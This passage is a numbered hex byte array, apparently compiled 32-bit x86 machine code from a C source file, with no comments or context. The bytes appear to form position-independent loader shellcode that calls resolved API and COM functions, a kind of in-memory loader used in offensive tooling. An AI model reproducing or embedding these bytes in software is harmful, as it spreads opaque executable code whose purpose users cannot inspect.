478 0xec, 0x14, 0x85, 0xc0, 0x0f, 0x84, 0xff, 0x01, 0x00, 0x00, 0x8b, 0x45,
479 0x90, 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0xf1, 0x01, 0x00, 0x00,
480 0xc7, 0x45, 0x94, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x00, 0x00,
481 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xcc, 0x00, 0x00, 0x00, 0xc7,
482 0x44, 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0x94, 0x89, 0x54,
483 0x24, 0x0c, 0x8d, 0x55, 0xa0, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
484 0x04, 0x05, 0x00, 0x00, 0x20, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff,
485 0xd0, 0x83, 0xec, 0x14, 0x89, 0x45, 0xbc, 0x83, 0x7d, 0xbc, 0x00, 0x0f,
486 0x85, 0x2d, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x7c, 0xff,
487 0xd0, 0x3d, 0x76, 0x2f, 0x00, 0x00, 0x0f, 0x85, 0x91, 0x01, 0x00, 0x00,
488 0xc7, 0x45, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80,
489 0xc0, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00,
490 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xa4, 0x89,
491 0x54, 0x24, 0x04, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
492 0xec, 0x10, 0x89, 0x45, 0xbc, 0x83, 0x7d, 0xbc, 0x00, 0x0f, 0x84, 0x52,
493 0x01, 0x00, 0x00, 0x8b, 0x45, 0xa4, 0x85, 0xc0, 0x0f, 0x84, 0x47, 0x01,
494 0x00, 0x00, 0x83, 0x7d, 0xe4, 0x00, 0x75, 0x3f, 0x8b, 0x45, 0x08, 0x8b,
495 0x58, 0x6c, 0x8b, 0x45, 0xa4, 0x89, 0x85, 0xc4, 0xfc, 0xff, 0xff, 0x8b,
496 0x45, 0x08, 0x8b, 0x40, 0x74, 0xff, 0xd0, 0x8b, 0x8d, 0xc4, 0xfc, 0xff,
497 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00,
498 0x00, 0x89, 0x04, 0x24, 0xff, 0xd3, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xe4,
499 0x83, 0x7d, 0xe4, 0x00, 0x75, 0x4f, 0xe9, 0x02, 0x01, 0x00, 0x00, 0x8b,
500 0x45, 0x08, 0x8b, 0x58, 0x70, 0x8b, 0x55, 0xa0, 0x8b, 0x45, 0xa4, 0x01,
501 0xd0, 0x89, 0x85, 0xc4, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x40,
502 0x74, 0xff, 0xd0, 0x8b, 0x8d, 0xc4, 0xfc, 0xff, 0xff, 0x89, 0x4c, 0x24,
503 0x0c, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04,
504 0x01, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xff, 0xd3, 0x83, 0xec, 0x10,
505 0x89, 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0xb7, 0x00, 0x00,
506 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0x55,
507 0xa4, 0x8b, 0x5d, 0xa0, 0x8b, 0x4d, 0xe4, 0x01, 0xcb, 0x8d, 0x4d, 0x98,
508 0x89, 0x4c, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04,
509 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89,
510 0x45, 0xbc, 0x8b, 0x55, 0xa0, 0x8b, 0x45, 0xa4, 0x01, 0xd0, 0x89, 0x45,
511 0xa0, 0xe9, 0xed, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xa0, 0x85, 0xc0, 0x74,
512 0x70, 0x8b, 0x45, 0x08, 0x8b, 0x58, 0x6c, 0x8b, 0x45, 0xa0, 0x89, 0x85,
513 0xc4, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x74, 0xff, 0xd0,
514 0x8b, 0x8d, 0xc4, 0xfc, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44,
515 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xff, 0xd3, 0x83,
516 0xec, 0x0c, 0x89, 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x74, 0x36, 0xc7,
517 0x45, 0x98, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb8,
518 0x00, 0x00, 0x00, 0x8b, 0x55, 0xa0, 0x8d, 0x4d, 0x98, 0x89, 0x4c, 0x24,
519 0x0c, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24, 0x04,
520 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89,
521 0x45, 0xe0, 0xeb, 0x01, 0x90, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0xcd,
522 0x00, 0x00, 0x00, 0x8b, 0x45, 0xa0, 0x85, 0xc0, 0x0f, 0x84, 0xc2, 0x00,
523 0x00, 0x00, 0x8b, 0x45, 0xa0, 0x89, 0x85, 0xc8, 0xfc, 0xff, 0xff, 0x8b,
524 0x45, 0x08, 0x8d, 0x90, 0x30, 0x0d, 0x00, 0x00, 0x8b, 0x45, 0xd0, 0x89,
525 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, 0x00, 0x00, 0xc7,
526 0x44, 0x24, 0x10, 0x00, 0x30, 0x00, 0x00, 0x8d, 0x85, 0xc8, 0xfc, 0xff,
527 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00,
528 0x00, 0x89, 0x54, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff,
529 0xe8, 0xdf, 0x41, 0x00, 0x00, 0x89, 0x45, 0xb8, 0x83, 0x7d, 0xb8, 0x00,
530 0x78, 0x28, 0x8b, 0x55, 0xa0, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x30, 0x0d,
531 0x00, 0x00, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24,
532 0x04, 0x89, 0x04, 0x24, 0xe8, 0x79, 0x3b, 0x00, 0x00, 0xc7, 0x45, 0xe0,
533 0x01, 0x00, 0x00, 0x00, 0xeb, 0x07, 0xc7, 0x45, 0xe0, 0x00, 0x00, 0x00,
534 0x00, 0x8b, 0x45, 0xa0, 0x89, 0x44, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04,
535 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x89, 0x04, 0x24, 0xe8, 0x21,
536 0x3b, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x58, 0x78, 0x8b, 0x45, 0x08,
537 0x8b, 0x40, 0x74, 0xff, 0xd0, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24, 0x08,
538 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xff,
539 0xd3, 0x83, 0xec, 0x0c, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xbc, 0x00, 0x00,
540 0x00, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
541 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xbc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc8,
542 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b,
543 0x80, 0xbc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xcc, 0x89, 0x14, 0x24, 0xff,
544 0xd0, 0x83, 0xec, 0x04, 0x83, 0x7d, 0xe0, 0x00, 0x0f, 0x84, 0xac, 0x00,
545 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x04, 0x02, 0x00, 0x00, 0x83,
546 0xf8, 0x03, 0x0f, 0x85, 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
547 0x80, 0x30, 0x0d, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x8b, 0x45, 0x08, 0x8b,
548 0x90, 0x2c, 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x89,
549 0xc3, 0x8b, 0x45, 0x08, 0x8d, 0x88, 0x18, 0x0d, 0x00, 0x00, 0x8b, 0x45,
550 0x08, 0x8d, 0x90, 0x08, 0x0d, 0x00, 0x00, 0x89, 0x5c, 0x24, 0x0c, 0x8b,
551 0x45, 0xb4, 0x89, 0x44, 0x24, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14,
552 0x24, 0xe8, 0x48, 0x45, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c,
553 0x8b, 0x40, 0x28, 0x8b, 0x4d, 0x08, 0x81, 0xc1, 0x00, 0x0c, 0x00, 0x00,
554 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x89, 0x0c, 0x24, 0xe8,
555 0x12, 0x42, 0x00, 0x00, 0x89, 0x45, 0xa8, 0x89, 0x55, 0xac, 0x8b, 0x45,
556 0xb4, 0x8b, 0x90, 0x1c, 0x05, 0x00, 0x00, 0x8b, 0x80, 0x18, 0x05, 0x00,
557 0x00, 0x89, 0xc3, 0x33, 0x5d, 0xa8, 0x89, 0xde, 0x89, 0xd0, 0x33, 0x45,
558 0xac, 0x89, 0xc7, 0x89, 0xf8, 0x09, 0xf0, 0x85, 0xc0, 0x74, 0x07, 0xb8,
559 0x00, 0x00, 0x00, 0x00, 0xeb, 0x03, 0x8b, 0x45, 0xe0, 0x8d, 0x65, 0xf4,
560 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x56, 0x53, 0x81, 0xec,
561 0x50, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7,
562 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xd4,
563 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x22, 0x01, 0x00, 0x00, 0x8b,
564 0x45, 0x08, 0x8b, 0x80, 0xd4, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b,
565 0x4d, 0x08, 0x8d, 0x99, 0x34, 0x08, 0x00, 0x00, 0x8b, 0x4d, 0x08, 0x81,
566 0xc1, 0x24, 0x08, 0x00, 0x00, 0x89, 0x54, 0x24, 0x08, 0x89, 0x5c, 0x24,
567 0x04, 0x89, 0x0c, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf4,
568 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0xde, 0x00, 0x00, 0x00, 0x8b, 0x45,
569 0x0c, 0x8d, 0x50, 0x0c, 0x8d, 0x85, 0xd4, 0xfd, 0xff, 0xff, 0x89, 0x44,
570 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
571 0xe8, 0x6a, 0xef, 0xff, 0xff, 0x8b, 0x45, 0x10, 0x8b, 0x00, 0x8b, 0x00,
572 0x8b, 0x40, 0x0c, 0x8b, 0x55, 0x10, 0x8d, 0x5a, 0x04, 0x8b, 0x55, 0x08,
573 0x8d, 0x8a, 0x44, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x12, 0x89,
574 0x5c, 0x24, 0x0c, 0x89, 0x4c, 0x24, 0x08, 0x8d, 0x8d, 0xd4, 0xfd, 0xff,
575 0xff, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
576 0x10, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x72, 0x8b, 0x45,
577 0x10, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b, 0x40, 0x28, 0x8b, 0x55, 0x10,
578 0x8b, 0x52, 0x04, 0x8d, 0x4d, 0xd4, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14,
579 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4,
580 0x00, 0x78, 0x5e, 0x8b, 0x45, 0xd4, 0x85, 0xc0, 0x74, 0x57, 0x8b, 0x45,
581 0x10, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b, 0x40, 0x24, 0x8b, 0x55, 0x10,
582 0x8d, 0x72, 0x08, 0x8b, 0x55, 0x08, 0x8d, 0x9a, 0x64, 0x08, 0x00, 0x00,
583 0x8b, 0x55, 0x08, 0x8d, 0x8a, 0x54, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x10,
584 0x8b, 0x52, 0x04, 0x89, 0x74, 0x24, 0x0c, 0x89, 0x5c, 0x24, 0x08, 0x89,
585 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89,
586 0x45, 0xf4, 0xeb, 0x15, 0x8b, 0x45, 0x10, 0xc7, 0x40, 0x04, 0x00, 0x00,
587 0x00, 0x00, 0xeb, 0x09, 0x8b, 0x45, 0x10, 0xc7, 0x00, 0x00, 0x00, 0x00,
588 0x00, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x0d, 0x8b, 0x45, 0x08, 0x8b, 0x80,
589 0xd4, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x44, 0x8b, 0x45, 0x08, 0x8b,
590 0x80, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8d, 0x5a, 0x08, 0x8b,
591 0x55, 0x08, 0x8d, 0x8a, 0x64, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x81,
592 0xc2, 0x54, 0x08, 0x00, 0x00, 0x89, 0x5c, 0x24, 0x10, 0x89, 0x4c, 0x24,
593 0x0c, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
594 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec,
595 0x14, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x79, 0x14, 0x8b, 0x45,
596 0x10, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00,
597 0x00, 0xe9, 0x4e, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x08,
598 0x8b, 0x00, 0x8b, 0x40, 0x28, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x08, 0x89,
599 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x83, 0x7d,
600 0xf4, 0x00, 0x0f, 0x88, 0x25, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x0f,
601 0xb6, 0x80, 0x0c, 0x01, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x2b, 0x8b, 0x45,
602 0x10, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x34, 0x8b, 0x55, 0x10,
603 0x8d, 0x4a, 0x0c, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x08, 0x89, 0x4c, 0x24,
604 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xf4,
605 0xe9, 0x85, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x01,
606 0x00, 0x00, 0x8d, 0x85, 0xd4, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08,
607 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xb0,
608 0xed, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00, 0x00,
609 0x8d, 0x95, 0xd4, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
610 0xec, 0x04, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x08, 0x8b,
611 0x00, 0x8b, 0x40, 0x30, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x0c, 0x8b, 0x55,
612 0x10, 0x8b, 0x52, 0x08, 0x89, 0x4c, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
613 0x00, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0xe8, 0x89, 0x4c, 0x24, 0x04, 0x89,
614 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xf4, 0x8b, 0x45,
615 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe8, 0x89, 0x14,
616 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88,
617 0x5d, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x0c, 0x8b, 0x00,
618 0x8b, 0x00, 0x8b, 0x55, 0x10, 0x8d, 0x5a, 0x10, 0x8b, 0x55, 0x08, 0x8d,
619 0x8a, 0x74, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x0c, 0x89,
620 0x5c, 0x24, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0,
621 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88,
622 0x21, 0x01, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x00, 0x00, 0x00, 0x00, 0x8b,
623 0x45, 0x0c, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x89, 0x45, 0xd8, 0x8b,
624 0x45, 0x08, 0x8b, 0x80, 0x84, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xd8, 0x89,
625 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0xc7,
626 0x04, 0x24, 0x11, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89,
627 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0xdd, 0x00, 0x00, 0x00,
628 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x40,
629 0x0c, 0x89, 0x45, 0xe0, 0xeb, 0x1e, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xf0,
630 0x01, 0xc2, 0x8b, 0x4d, 0x0c, 0x8b, 0x45, 0xf0, 0x01, 0xc8, 0x05, 0x28,
631 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x00, 0x88, 0x02, 0x83, 0x45, 0xf0, 0x01,
632 0x8b, 0x45, 0x0c, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x39, 0x45, 0xf0,
633 0x72, 0xd4, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x10, 0x8b, 0x00, 0x8b, 0x80,
634 0xb4, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x14, 0x8b, 0x55,
635 0x10, 0x8b, 0x52, 0x10, 0x89, 0x4c, 0x24, 0x08, 0x8b, 0x4d, 0xe4, 0x89,
636 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89,
637 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0,
638 0x89, 0x45, 0xec, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
639 0xe4, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xe0, 0xeb, 0x2e, 0x8b, 0x55, 0x0c,
640 0x8b, 0x45, 0xf0, 0x01, 0xd0, 0x05, 0x28, 0x05, 0x00, 0x00, 0xc6, 0x00,
641 0x00, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xf0, 0x01, 0xc2, 0x8b, 0x4d, 0x0c,
642 0x8b, 0x45, 0xf0, 0x01, 0xc8, 0x05, 0x28, 0x05, 0x00, 0x00, 0x0f, 0xb6,
643 0x00, 0x88, 0x02, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x45, 0x0c, 0x8b, 0x80,
644 0x24, 0x05, 0x00, 0x00, 0x39, 0x45, 0xf0, 0x72, 0xc4, 0x8b, 0x45, 0x08,
645 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x89, 0x14, 0x24,
646 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0xec, 0x8d, 0x65, 0xf8, 0x5b,
647 0x5e, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x81, 0xec, 0xc4, 0x02, 0x00,
648 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x00,
649 0x00, 0x00, 0x00, 0xc7, 0x45, 0x98, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45,
650 0x9c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x00, 0x00, 0x00, 0x00,
651 0xc7, 0x45, 0xa4, 0x00, 0x00, 0x00, 0x00, 0x66, 0xc7, 0x45, 0x82, 0x00,
652 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0x0c,
653 0x03, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x14, 0x8b, 0x00, 0x8b,
654 0x40, 0x40, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x1c, 0x8b, 0x55, 0x10, 0x8b,
655 0x52, 0x14, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
656 0xec, 0x08, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0xcd,
657 0x02, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x1c, 0x8b, 0x00, 0x8b,
658 0x40, 0x48, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x1c, 0x8d, 0x4d, 0xdc, 0x89,
659 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89,
660 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0x47, 0x05, 0x00, 0x00,
661 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x94, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xdc,
662 0x8d, 0x8d, 0x78, 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44,
663 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
664 0xec, 0x0c, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x98, 0x00,
665 0x00, 0x00, 0x8b, 0x55, 0xdc, 0x8d, 0x8d, 0x7c, 0xff, 0xff, 0xff, 0x89,
666 0x4c, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89,
667 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf0, 0x8b, 0x85,
668 0x7c, 0xff, 0xff, 0xff, 0x8b, 0x95, 0x78, 0xff, 0xff, 0xff, 0x29, 0xd0,
669 0x83, 0xc0, 0x01, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x0f, 0x84,
670 0xa3, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x88, 0x00, 0x00,
671 0x00, 0xc7, 0x44, 0x24, 0x08, 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
672 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x0c, 0x00, 0x00, 0x00,
673 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0x0f,
674 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0xd8, 0x00,
675 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00, 0x00, 0x8d,
676 0x85, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24,
677 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x6b, 0xea, 0xff, 0xff,
678 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x70,
679 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x95, 0x76, 0xfd, 0xff,
680 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xe4,
681 0x66, 0xc7, 0x45, 0xa8, 0x08, 0x20, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x88,
682 0x00, 0x00, 0x00, 0x8b, 0x95, 0x70, 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24,
683 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24,
684 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xb0,
685 0xc7, 0x45, 0x84, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x4a, 0x8b, 0x45, 0x08,
686 0x8b, 0x98, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c,
687 0x00, 0x00, 0x00, 0x8b, 0x55, 0x84, 0x8d, 0x0c, 0x95, 0x00, 0x00, 0x00,
688 0x00, 0x8b, 0x55, 0xe4, 0x01, 0xca, 0x8b, 0x12, 0x89, 0x14, 0x24, 0xff,
689 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x55, 0xb0, 0x89, 0x44, 0x24, 0x08, 0x8d,
690 0x45, 0x84, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd3, 0x83,
691 0xec, 0x0c, 0x8b, 0x45, 0x84, 0x83, 0xc0, 0x01, 0x89, 0x45, 0x84, 0x8b,
692 0x45, 0x84, 0x8b, 0x95, 0x70, 0xfd, 0xff, 0xff, 0x39, 0xd0, 0x72, 0xa9,
693 0xeb, 0x68, 0x66, 0xc7, 0x45, 0xa8, 0x08, 0x20, 0x8b, 0x45, 0x08, 0x8b,
694 0x80, 0x88, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x01, 0x00, 0x00,
695 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24,
696 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xb0,
697 0xc7, 0x45, 0x84, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x98,
698 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00,
699 0x00, 0x8d, 0x55, 0x82, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
700 0x8b, 0x55, 0xb0, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0x84, 0x89, 0x44,
701 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd3, 0x83, 0xec, 0x0c, 0xc7, 0x45,
702 0x84, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x8c, 0x00,
703 0x00, 0x00, 0x8d, 0x55, 0xa8, 0x89, 0x54, 0x24, 0x08, 0x8d, 0x55, 0x84,
704 0x89, 0x54, 0x24, 0x04, 0x8b, 0x55, 0xf4, 0x89, 0x14, 0x24, 0xff, 0xd0,
